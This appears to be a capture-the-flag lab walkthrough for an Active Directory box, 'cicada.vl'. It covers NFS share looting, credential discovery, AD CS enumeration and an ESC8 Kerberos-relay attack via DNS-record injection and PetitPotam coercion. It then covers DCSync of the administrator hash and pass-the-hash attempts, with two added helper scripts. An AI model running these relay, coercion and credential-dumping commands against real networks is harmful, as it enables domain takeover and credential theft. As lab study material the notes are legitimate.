# TAKEAWAYS

- xxx

---

# BLUF

- xxx

---

# Discover Ports & Services

- `ping` test

![[images/Pasted image 20260329140518.png]]

- `nmap` scan - light

![[images/Pasted image 20260329140737.png]]

  - Looks like a DC (Kerberos, LDAP, SMB, DNS)
  - Note: possible webserver on port 80
- `nmap` scan - detailed

![[images/Pasted image 20260329141310.png]]

- Add `DC-JPQ225.cicada.vl` and `cicada.vl` to `/etc/hosts` (Kerberos needs the FQDN to resolve; the IP alone will not do)
- `nmap` scan - UDP

![[images/Pasted image 20260329140814.png]]

---

# Service Enum

## Port 445 (SMB)

### Null Auth

- Note: `NTLM:False` in the `nxc` banner means NTLM authentication is disabled on the DC, so every tool has to talk Kerberos (`-k`) and anything that relies on NTLM (hash-based auth, NTLM relay) is off the table

![[images/Pasted image 20260329141900.png]]

- We need to update `/etc/krb5.conf`

```bash
nxc smb DC-JPQ225.cicada.vl --generate-krb5-file vulncicada.krb
sudo cp vulncicada.krb /etc/krb5.conf
```

![[images/Pasted image 20260329142156.png]]

- Still getting errors

![[images/Pasted image 20260329142821.png]]

## Port 2049 (NFS)

- Initial enum (quote the script glob so the shell does not expand it)

```bash
nmap -p2049 10.129.234.48 -sC -sV -O --script "nfs*"
showmount -e 10.129.234.48
```

- Mount the remote share

```bash
mkdir NFS
sudo mount -t nfs 10.129.234.48:/profiles ./NFS/ -o rw
```

- We have some names (one profile directory per user)

![[images/Pasted image 20260329143300.png]]

- Create `users.txt`

![[images/Pasted image 20260329152522.png]]

- Run `tree` to discover files within the dirs

![[images/Pasted image 20260329143706.png]]

- Docs in the `Rosie.Powell` dir show `nobody:nogroup` ownership (the export squashes UIDs, so file modes rather than owner mapping decide what we can read)
- Copy the images to the local drive

![[images/Pasted image 20260329152358.png]]

- Now run `exiftool`

![[images/Pasted image 20260329150530.png]]

- `marketing.png` has a password on the sticky note within the image

![[images/Pasted image 20260329150606.png]]

- Confirm creds

![[images/Pasted image 20260329150831.png]]

- Try uppercase > that works!

![[images/Pasted image 20260329151242.png]]

---

# AD Enum

## Revisit SMB

### Password Policy

- Nothing

![[images/Pasted image 20260329152151.png]]

### Shares

- We have RW over `profiles` and access to `CertEnroll`

![[images/Pasted image 20260329152753.png]]

- Crawl with `nxc smb [..] -M spider_plus`

```bash
nxc smb DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k -M spider_plus
```

- `CertEnroll` is the AD CS enrollment share (CA certificate and CRL material), so a CA is running on this DC
- `profiles` has an `.ini` file in the Recycle Bin

![[images/Pasted image 20260329153023.png]]

### Users

- Same user accounts as the profile directories on the NFS share

![[images/Pasted image 20260329152716.png]]

- Nothing interesting from `rid-brute`

![[images/Pasted image 20260329152745.png]]

## ASREP Roasting

```bash
nxc ldap DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k --asreproast asrep.out
```

![[images/Pasted image 20260329151409.png]]

## Kerberoasting

```bash
nxc ldap DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k --kerberoasting kerberoast.out
```

![[images/Pasted image 20260329151439.png]]

## ADCS

```bash
nxc ldap DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k -M adcs
```

- Cert attacks are on the menu!

![[images/Pasted image 20260329151533.png]]

- Enumerate templates (get a TGT first so `certipy-ad` can use the ccache)

```bash
kinit rosie.powell
klist
export KRB5CCNAME=/tmp/krb5cc_1000
certipy-ad find -target DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k
```

![[images/Pasted image 20260329151824.png]]

- Enumerate template vulns
  - ESC8 on the CA: the web enrollment endpoint (`http://dc-jpq225.cicada.vl/certsrv/`) accepts relayed authentication, so a coerced DC authentication can be turned into a certificate for the DC's machine account

```bash
certipy-ad find -target DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k -vulnerable -stdout
```

![[images/Pasted image 20260329152023.png]]

![[images/Pasted image 20260329153446.png]]

# ESC8 Exploit

## Attempt 1: `certipy-ad relay` and `PetitPotam.py`

- Start a relay on Kali

```bash
certipy-ad relay -target 'http://10.129.234.48'
```

![[images/Pasted image 20260329164822.png]]

- Set up `PetitPotam.py` > getting some errors

```bash
sudo wget https://raw.githubusercontent.com/topotam/PetitPotam/refs/heads/main/PetitPotam.py
sudo python3 PetitPotam.py -u rosie.powell -p "Cicada123" -d cicada.vl -k 10.10.14.197 10.129.234.48
```

![[images/Pasted image 20260329165736.png]]

- Enumerate coercion methods (PetitPotam included) with `nxc smb [...] -M coerce_plus`

```bash
nxc smb DC-JPQ225.cicada.vl -u "Rosie.Powell" -p "Cicada123" -k -M coerce_plus
```

![[images/Pasted image 20260329165844.png]]

## Attempt 2: `impacket-ntlmrelayx` and `PetitPotam.py`

- Set up the relay

```bash
impacket-ntlmrelayx -t http://DC-JPQ225.cicada.vl/certsrv/ -smb2support --adcs --template User
```

![[images/Pasted image 20260329170738.png]]

- Run `PetitPotam.py` > invalid checksum

```bash
python3 PetitPotam.py -d cicada.vl -u rosie.powell -p "Cicada123" -k 10.10.14.197 DC-JPQ225.cicada.vl
```

![[images/Pasted image 20260329170846.png]]

## Attempt 3: Add DNS Record > `certipy-ad relay` and `nxc -M coerce_plus`

- Neither of the above can work because NTLM is disabled: the coerced DC authenticates with Kerberos, and a plain NTLM relay has nothing to forward
- Instead, add a DNS record whose name is the DC's hostname followed by a marshalled target-info blob. When the DC is coerced into connecting to that name, Windows unmarshals the blob, builds the SPN from the part of the name in front of it and requests a Kerberos service ticket for that SPN, while the TCP connection lands on the record's address (the attacker)
- That AP-REQ is relayed to the CA web enrollment endpoint on the DC; because the CA runs on the DC itself, the ticket is encrypted with the same machine-account key the HTTP endpoint uses, so the relay yields a certificate for the DC machine account
- First, add a DNS record (any authenticated domain user can create records by default)

```bash
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.197
```

![[images/Pasted image 20260329201531.png]]

- Second, fire up the relay

```bash
certipy-ad relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
```

![[images/Pasted image 20260329201617.png]]

- Third, coerce with `nxc smb [..] -M coerce_plus -o LISTENER=<DNS record> METHOD=PetitPotam`

```bash
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam
```

![[images/Pasted image 20260329201848.png]]

- Getting some errors

![[images/Pasted image 20260329202422.png]]

### Retry steps 2 and 3

- Step 2 - set up the relay with an explicit subject DN for the CSR (and `-debug` to see why the first run failed)

```bash
certipy-ad -debug relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController -subject CN=DC-JPQ225,CN=Computer,DC=cicada,DC=vl
```

- Step 3 - rerun the `coerce_plus` module with the `PetitPotam` method

```bash
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam
```

![[images/Pasted image 20260329202813.png]]

- Now we have `dc-jpq225.pfx`
- Try `certipy-ad auth` with the `.pfx` (PKINIT, so no NTLM involved)

```bash
certipy-ad auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48
```

- We have the TGT (`dc-jpq225.ccache`) and the NT hash for `dc-jpq225$`

![[images/Pasted image 20260329203235.png]]

- NOTE: the NT hash is of no direct use here because NTLM is disabled; the machine-account TGT is what matters, since it is a DC account and can DCSync over Kerberos
- Use the TGT with `secretsdump.py`

```bash
KRB5CCNAME=dc-jpq225.ccache secretsdump.py -k -no-pass 'cicada.vl/dc-jpq225$@DC-JPQ225.cicada.vl' -just-dc-user administrator
```

![[images/Pasted image 20260329203421.png]]

- Now try PtH with `evil-winrm` > fail: with `--realm` evil-winrm authenticates via Kerberos and expects a ccache for `administrator`, while `-H` is an NTLM hash and NTLM is disabled, so we need a TGT for administrator but only have the NT hash

```bash
evil-winrm -i 10.129.234.48 -u administrator -H nthash --realm cicada.vl
```

![[images/Pasted image 20260329203955.png]]

- Try PtH with `psexec.py`

```bash
psexec.py cicada.vl/administrator@DC-JPQ225.cicada.vl -k -hashes :nthash
```

![[images/Pasted image 20260329204017.png]]
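The `nobody:nogroup` ownership seen on the NFS share above is worth checking systematically: files that keep a real UID can be read by creating a local user with that UID, while squashed files only give what their mode bits allow. The script below is an added example and not part of the original notes; it classifies `ls -ln` output by numeric owner. The listing it consumes is constructed sample data, the 65534 `nobody` id is the Linux default and is an assumption about the target.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): classify files on a mounted NFS export
# by numeric owner, separating real (unsquashed) UIDs from the 65534 "nobody" mapping.
# Input is `ls -ln` / `ls -lnR` output; run `ls -lnR ./NFS | nfs_owner_report` on a real mount.
set -u

NOBODY_UID=65534   # assumption: Linux default nobody/nogroup id used by root_squash/all_squash

# nfs_owner_class UID GID -> "squashed" or "mapped:UID:GID"
nfs_owner_class() {
    uid=$1; gid=$2
    if [ "$uid" -eq "$NOBODY_UID" ] && [ "$gid" -eq "$NOBODY_UID" ]; then
        printf 'squashed\n'
    else
        printf 'mapped:%s:%s\n' "$uid" "$gid"
    fi
}

# nfs_owner_report < ls -ln lines -> one line per file: <class> <name>
# Skips "total N" lines and the "./dir:" headers that ls -R emits.
nfs_owner_report() {
    while read -r mode links uid gid size mon day tm name; do
        case "$mode" in
            total|""|*:) continue ;;
        esac
        [ -n "${name:-}" ] || continue
        printf '%s %s\n' "$(nfs_owner_class "$uid" "$gid")" "$name"
    done
}

# count_unsquashed < report -> number of entries owned by a real UID (worth mapping locally)
count_unsquashed() { grep -c '^mapped:' || true; }

# Constructed sample listing standing in for `ls -ln ./NFS/Rosie.Powell`
SAMPLE='total 8
-rw-r--r-- 1 65534 65534  20480 Mar 29 14:30 marketing.png
-rw-r--r-- 1 65534 65534   1024 Mar 29 14:30 notes.docx
-rw------- 1  1105  513     512 Mar 29 14:30 secret.txt'

if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE" | nfs_owner_report
fi
```

In the sample, `secret.txt` is mode 0600 and owned by UID 1105, so it is unreadable through the squashed mount but becomes readable after `useradd -u 1105 mapped` and `su mapped`; the two squashed files are readable simply because their mode is 0644.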
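The "still getting errors" after generating `krb5.conf` is usually one of three things: a realm that is not upper-case, a KDC name that does not resolve, or clock skew over five minutes. The script below is an added example, not the notes' own tooling or the `nxc --generate-krb5-file` output; it writes a minimal `krb5.conf` for a Kerberos-only domain and runs those pre-flight checks. Domain `cicada.vl` and KDC `DC-JPQ225.cicada.vl` are taken from the notes; everything else (paths, the `ntpdate` check) is an assumption about the attacker box.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): write a minimal krb5.conf for a
# Kerberos-only AD domain and check the usual causes of kinit/nxc -k failures.
# Assumptions: Linux attacker box, domain cicada.vl, KDC DC-JPQ225.cicada.vl.
set -u

# realm_from_domain cicada.vl -> CICADA.VL  (Kerberos realms are upper-case; a
# lower-case realm is the most common reason a freshly written krb5.conf fails)
realm_from_domain() { printf '%s\n' "$1" | tr '[:lower:]' '[:upper:]'; }

# krb5_conf DOMAIN KDC_FQDN -> krb5.conf text on stdout
krb5_conf() {
    domain=$1; kdc=$2; realm=$(realm_from_domain "$domain")
    cat <<EOF
[libdefaults]
    default_realm = $realm
    dns_lookup_kdc = false
    dns_lookup_realm = false
    # do not reverse-resolve the KDC when building SPNs; /etc/hosts entries are enough
    rdns = false

[realms]
    $realm = {
        kdc = $kdc
        admin_server = $kdc
    }

[domain_realm]
    .$domain = $realm
    $domain = $realm
EOF
}

# krb5_conf_check FILE -> 0 if the essentials are present, 1 (with reasons) otherwise
krb5_conf_check() {
    f=$1; rc=0
    grep -Eq '^[[:space:]]*default_realm[[:space:]]*=[[:space:]]*[A-Z0-9.-]+[[:space:]]*$' "$f" \
        || { echo "default_realm missing or not upper-case"; rc=1; }
    grep -Eq '^[[:space:]]*kdc[[:space:]]*=' "$f" \
        || { echo "no kdc entry in [realms]"; rc=1; }
    grep -Eq '^\[domain_realm\]' "$f" \
        || { echo "no [domain_realm] mapping (host-to-realm lookups will fail)"; rc=1; }
    return $rc
}

# env_check KDC_FQDN -> the two runtime causes that no config file fixes:
# name resolution and clock skew (Kerberos allows 5 minutes by default)
env_check() {
    kdc=$1
    getent hosts "$kdc" >/dev/null || echo "WARN: $kdc does not resolve; add it to /etc/hosts"
    if command -v ntpdate >/dev/null; then
        # assumption: ntpdate is installed; the offset line shows how far off the DC clock is
        ntpdate -q "$kdc" 2>/dev/null | tail -n1
    fi
    return 0
}

if [ "${1:-}" = "--install" ]; then
    krb5_conf cicada.vl DC-JPQ225.cicada.vl > /tmp/krb5.conf
    krb5_conf_check /tmp/krb5.conf && sudo cp /tmp/krb5.conf /etc/krb5.conf
    env_check DC-JPQ225.cicada.vl
fi
```

After installing, `kinit rosie.powell` followed by `klist` is the real test; if `kinit` reports "Clock skew too great", sync with `sudo ntpdate DC-JPQ225.cicada.vl` (or `faketime`) before retrying.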